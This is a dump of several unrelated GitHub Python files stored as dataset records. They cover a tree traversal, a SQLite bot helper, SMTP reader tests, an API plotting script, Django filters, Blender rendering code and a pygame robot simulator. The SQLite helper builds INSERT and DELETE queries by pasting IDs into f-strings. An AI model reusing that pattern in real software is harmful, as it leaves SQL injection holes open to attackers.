add_to_answer(nodes, direction, answer):\n if direction == Direction.LeftToRight:\n for node in nodes:\n answer.append(node.data) \n else:\n for node in reversed(nodes):\n answer.append(node.data) \n\n\n\n\n\n\n\n\n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\n#Initial Template for Python 3\n\n\n\n#Contributed by Sudarshan Sharma\nfrom collections import deque\n# Tree Node\nclass Node:\n def __init__(self, val):\n self.right = None\n self.data = val\n self.left = None\n\n\n\n \n# Function to Build Tree \ndef buildTree(s):\n #Corner Case\n if(len(s)==0 or s[0]==\"N\"): \n return None\n \n # Creating list of strings from input \n # string after spliting by space\n ip=list(map(str,s.split()))\n \n # Create the root of the tree\n root=Node(int(ip[0])) \n size=0\n q=deque()\n \n # Push the root to the queue\n q.append(root) \n size=size+1 \n \n # Starting from the second element\n i=1 \n while(size>0 and i=len(ip)):\n break\n currVal=ip[i]\n \n # If the right child is not null\n if(currVal!=\"N\"):\n \n # Create the right child for the current node\n currNode.right=Node(int(currVal))\n \n # Push it to the queue\n q.append(currNode.right)\n size=size+1\n i=i+1\n return root\n \n \nif __name__==\"__main__\":\n t=int(input())\n for _ in range(0,t):\n s=input()\n root=buildTree(s)\n result = findSpiral(root)\n for value in result:\n print(value,end = \" \")\n print()\n \n \n\n# } Driver Code Ends","repo_name":"mostafa-asg/Algo","sub_path":"geeksforgeeks/tree/level-order-traversal-in-spiral-form/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"33502431478","text":"from loader import cursor, connect\n\ndef add_help_record(help_user_id,helper_id):\n sql_add_query = f\"INSERT INTO help_user VALUES({helper_id}, {help_user_id})\"\n cursor.execute(sql_add_query)\n connect.commit()\n\ndef delete_help_record(help_user_id):\n sql_delete_query = f\"DELETE from help_user where id_user = {help_user_id}\"\n cursor.execute(sql_delete_query)\n connect.commit()\n\ndef add_admin(id_user):\n sql_add_query = f\"INSERT INTO admin VALUES({id_user})\"\n cursor.execute(sql_add_query)\n connect.commit()\n\ndef delete_admin(user_id):\n sql_delete_query = f\"DELETE from admin where id = {user_id}\"\n cursor.execute(sql_delete_query)\n connect.commit()\n\ndef add_helper(id_user):\n sql_add_query = f\"INSERT INTO helper VALUES({id_user})\"\n cursor.execute(sql_add_query)\n connect.commit()\n\ndef delete_helper(user_id):\n sql_delete_query = f\"DELETE from helper where id = {user_id}\"\n cursor.execute(sql_delete_query)\n connect.commit()\n\ndef len_admin():\n list_admin = []\n result = cursor.execute(\"SELECT id FROM admin\").fetchall()\n for i in range(len(result)):\n res = result[i]\n id = res[0]\n list_admin.append(id)\n return list_admin\n\ndef len_helper():\n list_helper = []\n result = cursor.execute(\"SELECT id FROM helper\").fetchall()\n for i in range(len(result)):\n res = result[i]\n id = res[0]\n list_helper.append(id)\n return list_helper\n\ndef take_info(from_user_id):\n result = cursor.execute(\"SELECT user_id,user_name FROM users\").fetchall()\n for i in range(len(result)):\n res = result[i]\n id,user_name = res\n if from_user_id == id:\n return user_name \n\ndef ask_qui(id_user,text_message):\n pass","repo_name":"rksipythonpeople/hakaton","sub_path":"utils/func_change_bd.py","file_name":"func_change_bd.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31689115926","text":"import unittest\nfrom mox import MoxTestBase, IsA\nfrom gevent.socket import socket\n\nfrom slimta.smtp.datareader import DataReader\nfrom slimta.smtp.io import IO\nfrom slimta.smtp import ConnectionLost, MessageTooBig\n\n\nclass TestSmtpDataReader(MoxTestBase, unittest.TestCase):\n\n def setUp(self):\n super(TestSmtpDataReader, self).setUp()\n self.sock = self.mox.CreateMock(socket)\n self.sock.fileno = lambda: -1\n\n def test_append_line(self):\n dr = DataReader(None)\n dr._append_line(b'asdf')\n dr._append_line(b'jkl\\r\\n')\n dr.i += 1\n dr._append_line(b'qwerty')\n self.assertEqual([b'asdfjkl\\r\\n', b'qwerty'], dr.lines)\n\n def test_from_recv_buffer(self):\n io = IO(None)\n io.recv_buffer = b'test\\r\\ndata'\n dr = DataReader(io)\n dr.from_recv_buffer()\n self.assertEqual([b'test\\r\\n', b'data'], dr.lines)\n\n def test_handle_finished_line_EOD(self):\n dr = DataReader(None)\n dr.lines = [b'.\\r\\n']\n dr.handle_finished_line()\n self.assertEqual(0, dr.EOD)\n\n def test_handle_finished_line_initial_period(self):\n dr = DataReader(None)\n dr.lines = [b'..stuff\\r\\n']\n dr.handle_finished_line()\n self.assertEqual(b'.stuff\\r\\n', dr.lines[0])\n\n def test_add_lines(self):\n dr = DataReader(None)\n dr.add_lines(b'\\r\\ntwo\\r\\n.three\\r\\nfour')\n self.assertEqual([b'\\r\\n', b'two\\r\\n', b'three\\r\\n', b'four'], dr.lines)\n self.assertEqual(3, dr.i)\n self.assertEqual(None, dr.EOD)\n\n def test_recv_piece(self):\n self.sock.recv(IsA(int)).AndReturn(b'one\\r\\ntwo')\n self.sock.recv(IsA(int)).AndReturn(b'\\r\\nthree\\r\\n.\\r\\nstuff\\r\\n')\n self.mox.ReplayAll()\n dr = DataReader(IO(self.sock))\n self.assertTrue(dr.recv_piece())\n self.assertFalse(dr.recv_piece())\n self.assertEqual([b'one\\r\\n', b'two\\r\\n', b'three\\r\\n',\n b'.\\r\\n', b'stuff\\r\\n', b''], dr.lines)\n self.assertEqual(3, dr.EOD)\n self.assertEqual(5, dr.i)\n\n def test_recv_piece_already_eod(self):\n dr = DataReader(None)\n dr.EOD = 2\n self.assertFalse(dr.recv_piece())\n\n def test_recv_piece_connectionlost(self):\n self.sock.recv(IsA(int)).AndReturn(b'')\n self.mox.ReplayAll()\n dr = DataReader(IO(self.sock))\n self.assertRaises(ConnectionLost, dr.recv_piece)\n\n def test_recv_piece_messagetoobig(self):\n self.sock.recv(IsA(int)).AndReturn(b'1234567890')\n self.mox.ReplayAll()\n dr = DataReader(IO(self.sock), 9)\n self.assertRaises(MessageTooBig, dr.recv_piece)\n\n def test_return_all(self):\n io = IO(None)\n dr = DataReader(io)\n dr.lines = [b'one\\r\\n', b'two\\r\\n', b'.\\r\\n', b'three\\r\\n']\n dr.EOD = 2\n self.assertEqual(b'one\\r\\ntwo\\r\\n', dr.return_all())\n self.assertEqual(b'three\\r\\n', io.recv_buffer)\n\n def test_recv(self):\n self.sock.recv(IsA(int)).AndReturn(b'\\r\\nthree\\r\\n')\n self.sock.recv(IsA(int)).AndReturn(b'.\\r\\nstuff\\r\\n')\n self.mox.ReplayAll()\n io = IO(self.sock)\n io.recv_buffer = b'one\\r\\ntwo'\n dr = DataReader(io)\n self.assertEqual(b'one\\r\\ntwo\\r\\nthree\\r\\n', dr.recv())\n\n\n# vim:et:fdm=marker:sts=4:sw=4:ts=4\n","repo_name":"slimta/python-slimta","sub_path":"test/test_slimta_smtp_datareader.py","file_name":"test_slimta_smtp_datareader.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"54"} +{"seq_id":"28581420930","text":"import requests\nimport json\nimport pandas as pd\nfrom time import sleep\nimport matplotlib.pyplot as plt\n\ndef get_response(data: str,cantidad : int ) -> list:\n\n\t'''Obtiene los primeros 'X' characteres una API.\n\tLos datos devueltos se guardan en una lista y es retornada\n\n\tData = Url con una barra diagonal '/' como ultimo caracter.\n\tCantidad = Personajes a retornar.\n\n\tEjemplo : https://rickandmortyapi.com/api/character/ X-> La x se reemplazara luego por numeros entre 1-10\n\n\t'''\n\n\tcharacters = []\n\tfor i in range(1,cantidad+1):\n\n\t\turl = f'{data}{i}'\n\t\t# Paso los datos a formato JSON O DICCIONARIO\n\t\tr = requests.get(url).json()\n\t\tcharacters.append(r)\n\treturn characters\n\ndef apariciones(dato : list) -> dict:\n '''\n :param dato: Lista con los datos de los personajes\n :return: Diccionario con las apariciones en episodios de cada uno\n '''\n diccionario = {}\n indice = 0\n for i in range(0,len(dato)):\n diccionario[dato[indice]['name']] = len(dato[indice]['episode'])\n indice += 1\n return diccionario\n\nrick_morty = get_response('https://rickandmortyapi.com/api/character/',10)\n\ndf = pd.DataFrame(rick_morty)\n\ndf.set_index('id',inplace=True)\ndf=df.drop('created',axis=1)\ndf=df.drop('url',axis=1)\ndf = df.drop('image',axis=1)\ndf = df.drop('location',axis=1)\ndf = df.drop('origin',axis=1)\ndf = df.drop('type',axis=1)\npd.set_option('display.max_columns',5)\n\n\ndf['episode'] = df['episode'].apply(len)\n\nhumanos = [i for i in df['species'] if i == 'Human']\nmales = [i for i in df['gender'] if i == 'Male']\n\n# print(f\"Hay {len(humanos)} humanos en la lista\\n\"\n #f\"Hay {len(males)} hombres en la lista del total de {len(df['name'])}\")\n\n#Diccionario con los valores de los episodios donde aparece cada uno\n\napar_episodios = apariciones(rick_morty)\n\n#GRAFICO DE LAS APARICIONES\n\nnames = list(apar_episodios.keys())\nvalores = list(apar_episodios.values())\n\n\nplt.bar(names,valores,width=.6)\nplt.title('Apariciones en Episodios')\nplt.xlabel('Personajes')\nplt.ylabel('Cantidad De Episodios')\nplt.xticks(fontsize=7)\n\nplt.show()","repo_name":"gonzaloramosgh/PracticandoRequest","sub_path":"RequestAPI-RickAndMorty.py","file_name":"RequestAPI-RickAndMorty.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9599677965","text":"from django import template\n\nfrom recipes.models import Wishlist, Favorite, Follow\n\nregister = template.Library()\n\n\n@register.filter\ndef check_wishlist(recipe, user):\n \"\"\"Проверяет добавлен ли рецепт в список покупок\"\"\"\n check = Wishlist.objects.filter(\n recipe_id=recipe.id, user_id=user.id).exists()\n return check\n\n\n@register.filter\ndef check_favorite(recipe, user):\n \"\"\"Проверяет добавлен ли рецепт в избранное\"\"\"\n check = Favorite.objects.filter(\n recipe_id=recipe.id, user_id=user.id).exists()\n return check\n\n\n@register.filter\ndef check_subscription(author, user):\n \"\"\"Проверяет подписан ли текущий пользователь на автора\"\"\"\n check = Follow.objects.filter(\n following=author.id, subscriber=user.id).exists()\n return check\n","repo_name":"VolkovCode/foodgram-project","sub_path":"recipes/templatetags/check_atribute.py","file_name":"check_atribute.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21748449580","text":"import scipy.io\nimport bpy\nimport numpy as np\nimport colorsys\nfrom abc import ABC, abstractmethod\nimport os\nimport argparse\nimport sys\nimport glob\nimport sys\nimport matplotlib #modified by Justin Chen 5/22/20 to visualize right hand side of the brain\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg \nimport PIL\nfrom PIL import Image #end of modification - Justin Chen 5/22/20\n\ndef getInterpColor(abn_level, COLOR_POINTS, COLOR_POINTS_NEG): #modified by Justin Chen to represent negative values 5/27/20\n # given an abnormality level, it computes the associated color\n # works in HSV space\n\n if abn_level < 0:\n abn_level = abn_level *-1\n if abn_level >= (len(COLOR_POINTS_NEG)-1):\n abn_level = len(COLOR_POINTS_NEG) - 1.01\n \n sigmaLevel = int(abn_level)\n abn_level -= sigmaLevel\n assert 0 <= abn_level <= 1\n\n rgb_color = (1-abn_level)*COLOR_POINTS_NEG[sigmaLevel] + abn_level*COLOR_POINTS_NEG[sigmaLevel+1]\n else: #end of modification - Justin Chen 5/27/20\n if abn_level >= (len(COLOR_POINTS)-1):\n abn_level = len(COLOR_POINTS) - 1.01\n\n sigmaLevel = int(abn_level)\n abn_level -= sigmaLevel\n # print('abn_level', abn_level)\n # print('len(COLOR_POINTS)', len(COLOR_POINTS))\n # print('sigmaLevel', sigmaLevel)\n assert 0 <= abn_level <= 1\n\n # hue - 120 green 80 - yellow 40 - orange 0 -red\n rgb_color = (1-abn_level)*COLOR_POINTS[sigmaLevel] + abn_level*COLOR_POINTS[sigmaLevel+1]\n\n return rgb_color\n\ndef nZeroOne(a):\n return not (a == 0 or a == 1)\n\n\nclass BrainPainter(ABC):\n @abstractmethod\n def loadMeshes(self):\n pass\n\n def prepareScene(self, resolution, bckColor, fov, ortho_scale, BRAIN_TYPE):\n # delete the cube\n scene = bpy.context.scene\n for ob in scene.objects:\n if ob.type == 'MESH' and ob.name.startswith(\"Cube\"):\n ob.select = True\n else:\n ob.select = False\n bpy.ops.object.delete()\n bpy.data.worlds['World'].horizon_color = bckColor\n \n self.setCamera(resolution, fov, ortho_scale, BRAIN_TYPE)\n self.setLamp(BRAIN_TYPE)\n\n def deletePrevLamps(self):\n scene = bpy.data.scenes[\"Scene\"]\n for key in [k for k in scene.objects.keys() if k.startswith('Lamp')]:\n scene.objects[key].select = True\n bpy.ops.object.delete()\n\n for lamp_data in bpy.data.lamps:\n bpy.data.lamps.remove(lamp_data)\n\n def prepareCamera(self, resolution, fov):\n scene = bpy.data.scenes[\"Scene\"]\n\n # Set render resolution\n scene.render.resolution_x = resolution[0]*2 # need to multiply by 2 for some reason\n scene.render.resolution_y = resolution[1]*2\n\n # Set camera fov in degrees\n\n pi = 3.14159265\n scene.camera.data.angle = fov * (pi / 180.0)\n\n # Set camera rotation in euler angles\n scene.camera.rotation_mode = 'XYZ'\n\n @abstractmethod\n def setCamera(self, resolution, fov, ortho_scale, BRAIN_TYPE):\n pass\n\n @abstractmethod\n def setLamp(self, BRAIN_TYPE):\n pass\n\n\nclass CorticalPainter(BrainPainter):\n def __init__(self, cortFiles):\n self.cortFiles = cortFiles\n\n # def loadCortical(cortFiles):\n\n def loadMeshes(self):\n # import cortical regions and set them to be almost transparent\n \n for i in range(len(self.cortFiles)):\n bpy.ops.import_mesh.ply(filepath=self.cortFiles[i])\n\n if bpy.context.selected_objects:\n for obj in bpy.context.selected_objects:\n regionName = obj.name\n if not 'mat_%s' % regionName in bpy.data.materials.keys():\n material = makeMaterial('mat_%s' % regionName, (0.3, 0.3, 0.3), (1, 1, 1), 1.0)\n obj.data.materials.append(material)\n else:\n material = bpy.data.materials['mat_%s' % regionName]\n material.diffuse_color = (0.3, 0.3, 0.3)\n material.alpha = 1\n obj.data.materials.append(material)\n\n def setCamera(self, resolution, fov, ortho_scale, BRAIN_TYPE):\n\n scene = bpy.data.scenes[\"Scene\"]\n\n self.prepareCamera(resolution, fov)\n\n pi = 3.14159265\n \n scene.camera.rotation_euler = (pi / 2, 0, -3 * pi / 2)\n # Set camera location\n scene.camera.location = (167.00, -15.1, 3.824)\n if BRAIN_TYPE == 'inflated':\n scene.camera.location = (167.00, -0.3, 3.824)\n\n bpy.data.cameras['Camera'].type = 'ORTHO'\n bpy.data.cameras['Camera'].ortho_scale = ortho_scale\n bpy.data.cameras['Camera'].clip_end = 1000\n # bpy.data.objects['']\n\n def setLamp(self, BRAIN_TYPE):\n \n energyAll = 5\n distanceAll = 1000\n\n scene = bpy.data.scenes[\"Scene\"]\n self.deletePrevLamps()\n\n lampIndices = [1, 2, 3, 4]\n lampLocs = [(136, 45, 72), (136, -105, -64), (136, -105, 72), (136, 45, -64)]\n if BRAIN_TYPE == 'inflated':\n lampIndices = [1, 2, 3, 4, 5]\n lampLocs = [(136, 160, 130), (136, -140, -64), (136, -140, 130), (136, 160, -64), (136, 0, 130)]\n energyAll = 13\n\n nrLamps = len(lampIndices)\n\n for l in range(nrLamps):\n # Create new lamp datablock\n lamp_data = bpy.data.lamps.new(name=\"lamp%d data\" % lampIndices[l], type='POINT')\n # Create new object with our lamp datablock\n lamp = bpy.data.objects.new(name=\"Lamp%d\" % lampIndices[l], object_data=lamp_data)\n # Link lamp object to the scene so it'll appear in this scene\n scene.objects.link(lamp)\n # Place lamp to a specified location\n scene.objects['Lamp%d' % lampIndices[l]].location = lampLocs[l]\n lamp_data.energy = energyAll\n lamp_data.distance = distanceAll\n\n\n # print(lampaaa)\n\n\nclass CorticalPainterInner(CorticalPainter):\n def __init__(self, cortFiles):\n self.cortFiles = cortFiles\n\n def loadMeshes(self):\n # import cortical regions and set them to be almost transparent\n for i in range(len(self.cortFiles)):\n bpy.ops.import_mesh.ply(filepath=self.cortFiles[i])\n\n if bpy.context.selected_objects:\n for obj in bpy.context.selected_objects:\n regionName = obj.name\n if not 'mat_%s' % regionName in bpy.data.materials.keys():\n material = makeMaterial('mat_%s' % regionName, (0.3, 0.3, 0.3), (1, 1, 1), 1.0)\n obj.data.materials.append(material)\n else:\n material = bpy.data.materials['mat_%s' % regionName]\n material.diffuse_color = (0.3, 0.3, 0.3)\n material.alpha = 1\n obj.data.materials.append(material)\n\n def setCamera(self, resolution, fov, ortho_scale, BRAIN_TYPE):\n\n scene = bpy.data.scenes[\"Scene\"]\n\n self.prepareCamera(resolution, fov)\n\n pi = 3.14159265\n scene.camera.rotation_euler = (pi / 2, 0, -pi / 2)\n # Set camera location\n scene.camera.location = (-71, -15.1, 3.824)\n if BRAIN_TYPE == 'inflated':\n scene.camera.location = (-71, -1.3, 3.824)\n\n bpy.data.cameras['Camera'].type = 'ORTHO'\n bpy.data.cameras['Camera'].ortho_scale = ortho_scale\n bpy.data.cameras['Camera'].clip_end = 1000\n\n def setLamp(self, BRAIN_TYPE):\n\n energyAll = 5\n distanceAll = 1000\n\n scene = bpy.data.scenes[\"Scene\"]\n self.deletePrevLamps()\n\n lampIndices = [1, 2, 3, 4]\n # y + 20\n lampLocs = [(-80, 70, 72), (-80, -80, -64), (-80, -80, 72), (-80, 70, -64)]\n if BRAIN_TYPE == 'inflated':\n lampIndices = [1, 2, 3, 4, 5]\n lampLocs = [(-130, 150, 70), (-130, -150, -120), (-130, -150, 70), (-130, 150, -130), (-130, 0, 170), (-90, 0, -90)]\n energyAll = 11\n\n nrLamps = len(lampIndices)\n\n for l in range(nrLamps):\n # Create new lamp datablock\n lamp_data = bpy.data.lamps.new(name=\"lamp%d data\" % lampIndices[l], type='POINT')\n # Create new object with our lamp datablock\n lamp = bpy.data.objects.new(name=\"Lamp%d\" % lampIndices[l], object_data=lamp_data)\n # Link lamp object to the scene so it'll appear in this scene\n scene.objects.link(lamp)\n # Place lamp to a specified location\n scene.objects['Lamp%d' % lampIndices[l]].location = lampLocs[l]\n lamp_data.energy = energyAll\n lamp_data.distance = distanceAll\n\n\n # print(lampaaa)\n\n\nclass SubcorticalPainter(BrainPainter):\n def __init__(self, cortFiles, subcortFiles):\n self.cortFiles = cortFiles\n self.subcortFiles = subcortFiles\n\n # def loadSubcortical(self, cortFiles, subcortFiles):\n def loadMeshes(self):\n # import cortical regions and set them to be almost transparent\n for i in range(len(self.cortFiles)):\n bpy.ops.import_mesh.ply(filepath=self.cortFiles[i])\n\n if bpy.context.selected_objects:\n for obj in bpy.context.selected_objects:\n regionName = obj.name\n if not 'mat_%s' % regionName in bpy.data.materials.keys():\n material = makeMaterial('mat_%s' % regionName, (0.3, 0.3, 0.3), (1, 1, 1), 0.1)\n obj.data.materials.append(material)\n else:\n bpy.data.materials['mat_%s' % regionName].diffuse_color = (0.3, 0.3, 0.3)\n bpy.data.materials['mat_%s' % regionName].alpha = 1\n\n obj.select = False\n\n # import subcortical regions\n for i in range(len(self.subcortFiles)):\n bpy.ops.import_mesh.ply(filepath=self.subcortFiles[i])\n\n if bpy.context.selected_objects:\n for obj in bpy.context.selected_objects:\n regionName = obj.name\n if not 'mat_%s' % regionName in bpy.data.materials.keys():\n material = makeMaterial('mat_%s' % regionName, (0.3, 0.3, 0.3), (1, 1, 1), 1)\n obj.data.materials.append(material)\n else:\n # assert(False)\n material = bpy.data.materials['mat_%s' % regionName]\n material.diffuse_color = (0.3, 0.3, 0.3)\n material.alpha = 1\n obj.data.materials.append(material)\n\n def setCamera(self, resolution, fov, ortho_scale, BRAIN_TYPE):\n\n scene = bpy.data.scenes[\"Scene\"]\n self.prepareCamera(resolution, fov)\n\n # scene.camera.rotation_euler = (1.15, -0.02, -8.63) # subcort only\n scene.camera.rotation_euler = (1.1499, -0.01999, -8.2985) # half-cort half subcort\n\n # Set camera translation\n # scene.camera.location = (-107.3, 66.8, 43.1) # subcort only\n scene.camera.location = (-168.3, 66.8, 83.1) # half cort half subcort\n\n bpy.data.cameras['Camera'].clip_end = 1000\n\n def setLamp(self, BRAIN_TYPE):\n\n energyAll = 7\n distanceAll = 1000\n\n scene = bpy.data.scenes[\"Scene\"]\n self.deletePrevLamps()\n\n lampIndices = [1, 2]\n lampLocs = [(-82.53, 0.79, 72.87), (88.53, 119.79, 72.87)]\n\n nrLamps = len(lampIndices)\n\n for l in range(nrLamps):\n # Create new lamp datablock\n lamp_data = bpy.data.lamps.new(name=\"lamp%d data\" % lampIndices[l], type='POINT')\n # Create new object with our lamp datablock\n lamp = bpy.data.objects.new(name=\"Lamp%d\" % lampIndices[l], object_data=lamp_data)\n # Link lamp object to the scene so it'll appear in this scene\n scene.objects.link(lamp)\n # Place lamp to a specified location\n scene.objects['Lamp%d' % lampIndices[l]].location = lampLocs[l]\n lamp_data.energy = energyAll\n lamp_data.distance = distanceAll\n\n\ndef delobj():\n scene = bpy.data.scenes[\"Scene\"]\n for ob in scene.objects:\n if ob.type == 'MESH' and (\n ob.name.startswith(\"Left\") or ob.name.startswith(\"Right\") or ob.name.startswith('lh.') or ob.name.startswith(\n 'rh.')):\n ob.select = True\n else:\n ob.select = False\n if ob.name.startswith('Lamp'):\n ob.select = True\n bpy.ops.object.delete()\n bpy.ops.object.material_slot_remove()\n for material in bpy.data.materials:\n if not material.users:\n bpy.data.materials.remove(material)\n\n\ndef makeMaterial(name, diffuse, specular, alpha):\n mat = bpy.data.materials.new(name)\n mat.diffuse_color = diffuse\n mat.diffuse_shader = 'LAMBERT'\n mat.diffuse_intensity = 1.0\n mat.specular_color = specular\n mat.specular_shader = 'COOKTORR'\n mat.specular_intensity = 0.2\n mat.alpha = alpha\n mat.ambient = 1\n mat.use_transparency = True\n mat.use_shadows = False\n return mat\n\n\ndef setMaterial(ob, mat):\n me = ob.data\n me.materials.append(mat)\n\n\n\ndef colorRegionsAndRender(indexMap, matDf, COLOR_POINTS, COLOR_POINTS_NEG, OUT_FOLDER, IMG_TYPE):\n objList = bpy.context.selected_objects[::-1] # make sure to remove the cube from the scene\n # print(objList)\n\n cols = matDf.columns.to_list()\n imageNames = matDf.loc[:,'Image-name-unique'].values\n\n imageNames = [''.join(n.split(' ')) for n in imageNames] # remove spaces in names\n matDf = matDf.loc[:,cols[1]:]\n\n for imgIndex in range(matDf.shape[0]):\n\n # for each event get the sum of all the probabilities until the current stage\n # eventsAbnormality = matDf.loc[imgIndex,:].values\n\n # calc abnorm for plottable biomk\n if bpy.context.selected_objects:\n for obj in bpy.context.selected_objects:\n # print(obj.name, obj, obj.type)\n regionName = obj.name\n\n if regionName in indexMap.keys():\n # 'Left-Caudate -> nonZlabelNr -> [z-labelNrs], between 1-3'\n targetLabel = indexMap[regionName]\n if targetLabel != -1:\n\n\n # abnormality values for each significance levels\n signifAbnorm = matDf.loc[imgIndex,targetLabel]\n\n # colors for each significance levels\n finalColor = getInterpColor(signifAbnorm, COLOR_POINTS, COLOR_POINTS_NEG) #modified by Justin Chen to represent negative values 5/27/20\n\n # print(\"regionName\", regionName, finalColor)\n\n # if regionName == 'rh.pial.DK.inferiorparietal':\n # print('targetLabel', targetLabel)\n # print('finalColor', finalColor)\n # print('signifAbnorm', signifAbnorm)\n\n # material = makeMaterial('mat_%d_%d_%s' % (matrixIndex, imgIndex, regionName), finalColor, (1,1,1), 1)\n # setMaterial(obj, material)\n # obj.material_slots[0].material = bpy.data.materials['mat_%d_%d_%s' % (matrixIndex, imgIndex, regionName)]\n bpy.data.materials['mat_%s' % regionName].diffuse_color = finalColor\n\n # obj.data.materials.append(material)\n\n else:\n print('object not found: %s' % obj.name)\n\n # print(adsas)\n outputFile = '%s/%s_%s.png' % (OUT_FOLDER, IMG_TYPE, imageNames[imgIndex])\n print('rendering file %s' % outputFile)\n bpy.data.scenes['Scene'].render.filepath = outputFile\n bpy.ops.render.render(write_still=True)\n \n #modified by Justin Chen 5/22/20\n # flip right images\n if \"right\" in imageNames[imgIndex]:\n im = Image.open(outputFile)\n out = im.transpose(PIL.Image.FLIP_LEFT_RIGHT)\n out.save(outputFile)\n\n #img = mpimg.imread(outputFile)\n #img = mpimg.imread('E:/Users/spectR/Desktop/%Rutgers/RESEARCH/brain-coloring/output/DK_output/cortical-inner_left_area.png')\n #img2 = np.fliplr(img)\n #plt.imshow(img2)\n #plt.axis(\"off\")\n #plt.subplots_adjust(bottom = 0)\n #plt.subplots_adjust(top = 1)\n #plt.subplots_adjust(right = 1)\n #plt.subplots_adjust(left = 0)\n #plt.savefig(outputFile, dpi=200)\n #plt.show()\n #plt.close()\n\n # delete extraneous subcorticals\n if \"subcortical\" in IMG_TYPE:\n if \"grayvol\" in imageNames[imgIndex] or \"thck\" in imageNames[imgIndex]:\n os.remove(outputFile)\n #end of modification - Justin Chen 5/22/20\n sys.stdout.flush()\n\n","repo_name":"jutchn/Research","sub_path":"Brainpainter/blendHelper.py","file_name":"blendHelper.py","file_ext":"py","file_size_in_byte":15277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8127908960","text":"'''\nCriar uma função que me lembre a parar de estudar e fazer uma pausa a cada 2h\nTrabalho inicia de 8h às 12\n'''\n\nimport webbrowser\nimport time\n\nintervalo = 2\ncontador = 0\nprint('O programa de controle de descanso foi ativado.')\n\n\nwhile contador < intervalo:\n time.sleep(10)\n","repo_name":"lssdeveloper/python3em6h","sub_path":"pausa_para _descansar.py","file_name":"pausa_para _descansar.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24201659705","text":"import pygame\nfrom math import sin, cos, tan, radians, sqrt, atan2\n\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\npygame.init()\n\n# Set the width and height of the screen [width, height]\nsize = (800, 800)\nscreen = pygame.display.set_mode(size)\n\npygame.display.set_caption(\"Omni_simu\")\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n\nSIZE = 20\nspeed_a = 0 #cm.s-1\nspeed_b = 0\nspeed_c = 0\nyaw = 0\ncx = 300\ncy = 300\njoy = pygame.joystick.Joystick(0)\njoy.init()\n\n# -------- Main Program Loop -----------\nwhile not done:\n # --- Main event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n # --- Game logic should go here\n axis_yaw = joy.get_axis(0)\n axis_roll = joy.get_axis(3)\n axis_pitch = joy.get_axis(4)\n\n speed_cmd = sqrt(axis_roll * axis_roll + axis_pitch * axis_pitch)\n angle_cmd = atan2(axis_pitch, axis_roll) - radians(90)\n\n\n print(axis_yaw, axis_roll, axis_pitch)\n\n #speed_a = 0.5 * axis_yaw + 0.5 * cos(angle_cmd)\n speed_a = 0.5 * axis_yaw + 0.5 * cos(radians(90) + angle_cmd) * speed_cmd\n #speed_b = 0.5 * axis_yaw + 0.5 * cos(radians(60) + angle_cmd)\n speed_b = 0.5 * axis_yaw + 0.5 * cos(radians(210) + angle_cmd) * speed_cmd\n #speed_c = 0.5 * axis_yaw + 0.5 * cos(radians(-60) + angle_cmd)\n speed_c = 0.5 * axis_yaw + 0.5 * cos(radians(-30) + angle_cmd) * speed_cmd\n print('**', speed_a, speed_b, speed_c, yaw)\n\n #print(axis_yaw)\n vec_a = (speed_a * cos(radians(yaw)), speed_a * -sin(radians(yaw)))\n vec_b = (speed_b * cos(radians(yaw + 120)), speed_b * -sin(radians(yaw + 120)))\n vec_c = (speed_c * cos(radians(yaw - 120)), speed_c * -sin(radians(yaw - 120)))\n vec_res = tuple(map(sum, zip(vec_a, vec_b, vec_c)))\n cx += vec_res[0] * 10\n cy += vec_res[1] * 10\n yaw -= (speed_a + speed_b + speed_c) * 10\n polygon_points = [[cx + SIZE * cos(radians(90 + yaw)),\n cy - SIZE * sin(radians(90 + yaw))],\n [cx + SIZE * cos(radians(-30 + yaw)),\n cy - SIZE * sin(radians(-30 + yaw))],\n [cx + SIZE * cos(radians(-150 + yaw)),\n cy - SIZE * sin(radians(-150 + yaw))]]\n\n # --- Screen-clearing code goes here\n\n # Here, we clear the screen to white. Don't put other drawing commands\n # above this, or they will be erased with this command.\n\n # If you want a background image, replace this clear with blit'ing the\n # background image.\n screen.fill(WHITE)\n\n # --- Drawing code should go here\n pygame.draw.polygon(screen, BLACK, polygon_points)\n pygame.draw.circle(screen, RED, [int(polygon_points[0][0]), int(polygon_points[0][1])], 5)\n # --- Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n\n # --- Limit to 60 frames per second\n clock.tick(30)\n\n# Close the window and quit.\npygame.quit()\n","repo_name":"agervail/holo_robot","sub_path":"simu/simu_pygame.py","file_name":"simu_pygame.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16368519522","text":"import datetime\nfrom django.shortcuts import render\nfrom .serializers import *\nfrom .models import *\nfrom django.contrib.auth import authenticate\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User, Group\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status,viewsets\nfrom django.http import Http404\nfrom rest_framework.authtoken.models import Token\nfrom django.contrib.auth.hashers import check_password\nfrom django.http import HttpResponse\n# Create your views here.\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users 